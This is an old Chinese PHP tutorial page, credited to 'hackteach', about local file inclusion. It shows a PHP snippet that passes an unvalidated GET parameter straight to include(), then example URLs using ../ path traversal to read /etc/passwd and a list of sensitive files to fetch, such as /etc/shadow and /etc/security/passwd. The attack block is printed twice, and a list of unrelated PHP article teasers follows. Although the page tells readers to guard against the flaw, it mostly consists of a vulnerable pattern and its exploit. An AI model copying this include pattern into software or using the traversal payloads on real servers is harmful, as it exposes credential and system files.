php 伪造本地文件包含漏洞的代码
更新时间:2011年11月03日 23:33:36 作者:
php 伪造本地文件包含漏洞的代码,大家一定要注意防范。
代码:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
复制代码 代码如下:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
相关文章
这篇文章主要介绍了php ActiveMQ的安装与使用方法,结合图文与实例形式分析了ActiveMQ的功能、安装、使用方法及操作注意事项,需要的朋友可以参考下2020-02-02
本篇文章是对php扩展php_curl.dll不加载的解决方法进行了详细的分析介绍,需要的朋友参考下2013-06-06
下面小编就为大家带来一篇PHP生成制作验证码的简单实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2016-06-06
这篇文章主要介绍了php5.3后静态绑定用法,结合具体示例分析了php5.3开始引入的后静态绑定相关概念、功能、使用方法与注意事项,并搜集了来自网友的典型分析说明,需要的朋友可以参考下2016-11-11
下面小编就为大家带来一篇浅谈PHP的exec()函数无返回值排查方法(必看)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-03-03
在本篇文章里小编给大家整理的是一篇关于php复制文件后改名的方法及相关内容,有兴趣的朋友们可以学习下。2021-09-09
本篇文章中小编给大家分享了一篇关于PHP将整数数字转换为罗马数字的知识点以及实例内容,需要的朋友们学习下。2019-03-03
mktime(hour,minute,second,month,day,year,is_dst)这是mktime的语法说明,一目了然应该不难写出一个时间戳的代码来2012-05-05
今天在使用split时遇到一些问题。还是对函数理解不深刻,特写出来做个记号2012-10-10
下面小编就为大家分享一篇php 删除一维数组中某一个值元素的操作方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧2018-02-02
最新评论